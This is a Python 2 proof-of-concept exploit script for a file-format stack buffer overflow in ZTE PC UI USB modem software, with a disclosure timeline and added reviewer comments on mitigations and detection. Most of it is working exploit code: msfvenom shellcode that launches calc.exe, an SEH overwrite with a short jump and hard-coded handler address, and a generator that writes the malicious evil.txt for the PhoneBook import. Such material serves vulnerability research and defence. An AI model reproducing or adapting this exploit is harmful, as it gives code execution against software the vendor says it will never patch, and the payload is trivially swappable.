#!/usr/bin/python -w
# Title : ZTE PC UI USB MODEM SOFTWARE Buffer Overflow
# Date : 17/09/2015
# Author : R-73eN
# Tested on : Windows Xp sp3 on software Eagle Speed PCW_EAGLEALBp671A1V1.0.0B02
# Since all the PC UI based software shares the same source code they are all vulnerable.(Confirmed By ZTE)
# The problem exists into the import function at PhoneBook Menu which doesn't
# validate data and importing a malformed file leads to code execution.
#
# Triggering the Vulnerability
# run this python script which will save an evil.txt file.
# Open Eagle Speed, go to PhoneBook , click Import and select the evil.txt File
# A calculator Should pop up.
#
# Disclosure Timeline:
# [16/08/2015] - Vendor notified
# [18/08/2015] - Vendor Responded asking for more details
# [17/08/2015] - Vendor Responded that will not release a patch since the product is at end of life.
# NOTE(review): the third timeline entry is dated before the second one; this
# looks like a typo in the advisory - confirm against the original disclosure.
#
# Solution:
# Don't import unknown text file.
#
# Video - https://www.youtube.com/watch?v=jbv1L4TrHTY
#
# Reviewer summary: proof-of-concept generator for a file-format stack overflow
# with an SEH (structured exception handler) overwrite. The script only builds
# a byte string and writes it to evil.txt; the overflow itself happens in the
# PhoneBook import routine of the target application.
# Python 2 only: it uses the print statement and treats str as raw bytes.
#
# Defensive notes:
# - Per the timeline above no vendor patch will be released (end of life), so
#   the practical mitigations are retiring or replacing the affected PC UI
#   software and not importing phonebook files from untrusted sources.
# - This class of bug is what SafeSEH, SEHOP, DEP and ASLR are designed to
#   blunt; whether any of them apply to the tested build is not shown here.
# - Detection idea: the modem UI process spawning an unexpected child process
#   (this PoC launches calc.exe) right after a phonebook import.

# Cosmetic ASCII-art banner, printed once at start-up.
# NOTE(review): the spacing inside these literals looks collapsed by the page
# extraction; this affects only the printed banner, not the generated file.
banner = ""
banner +="_________ __\n"
banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"
banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"
banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"
banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner

# Demonstration payload. The generator command is recorded by the author in the
# comment below: a Windows "exec" payload that runs calc.exe, with the -b list
# naming the byte values the encoder was told to avoid.
shellcode =""
#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x20\x3f"
shellcode += "\xba\x49\xc7\x99\xe5\xda\xd7\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x31\x83\xc3\x04\x31\x53\x0f\x03\x53\x46\x25"
shellcode += "\x6c\x19\xb0\x2b\x8f\xe2\x40\x4c\x19\x07\x71\x4c\x7d"
shellcode += "\x43\x21\x7c\xf5\x01\xcd\xf7\x5b\xb2\x46\x75\x74\xb5"
shellcode += "\xef\x30\xa2\xf8\xf0\x69\x96\x9b\x72\x70\xcb\x7b\x4b"
shellcode += "\xbb\x1e\x7d\x8c\xa6\xd3\x2f\x45\xac\x46\xc0\xe2\xf8"
shellcode += "\x5a\x6b\xb8\xed\xda\x88\x08\x0f\xca\x1e\x03\x56\xcc"
shellcode += "\xa1\xc0\xe2\x45\xba\x05\xce\x1c\x31\xfd\xa4\x9e\x93"
shellcode += "\xcc\x45\x0c\xda\xe1\xb7\x4c\x1a\xc5\x27\x3b\x52\x36"
shellcode += "\xd5\x3c\xa1\x45\x01\xc8\x32\xed\xc2\x6a\x9f\x0c\x06"
shellcode += "\xec\x54\x02\xe3\x7a\x32\x06\xf2\xaf\x48\x32\x7f\x4e"
shellcode += "\x9f\xb3\x3b\x75\x3b\x98\x98\x14\x1a\x44\x4e\x28\x7c"
shellcode += "\x27\x2f\x8c\xf6\xc5\x24\xbd\x54\x83\xbb\x33\xe3\xe1"
shellcode += "\xbc\x4b\xec\x55\xd5\x7a\x67\x3a\xa2\x82\xa2\x7f\x5c"
shellcode += "\xc9\xef\x29\xf5\x94\x65\x68\x98\x26\x50\xae\xa5\xa4"
shellcode += "\x51\x4e\x52\xb4\x13\x4b\x1e\x72\xcf\x21\x0f\x17\xef"
shellcode += "\x96\x30\x32\x8c\x79\xa3\xde\x7d\x1c\x43\x44\x82"

# Output file name; written relative to the current working directory.
filename="evil.txt"

# The two 4-byte fields that land on the exception registration record:
# nSEH is an x86 short jump (EB 06) followed by two NOPs (90 90).
nSEH = "\xEB\x06\x90\x90"
# SEH is a hard-coded handler address, 0x0f9f11ab in little-endian byte order.
# NOTE(review): presumably it points into a module loaded by the tested build;
# the page does not name the module, so the value is specific to that
# environment - confirm before relying on it for reproduction or signatures.
SEH = "\xab\x11\x9f\x0f"

# File layout: 3136 filler bytes, nSEH, SEH, then the payload padded with "D"
# so that payload + padding always occupy 2856 bytes (6000 bytes in total).
# The fixed, oversized length is the property an import-side length check
# would have to reject.
buffer = "A" * 3136 + nSEH + SEH + shellcode + "D" * (2856 - len(shellcode))

# Write the crafted content and close the handle explicitly (text mode 'w').
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
print "[+] Evil.txt created successfully [+]"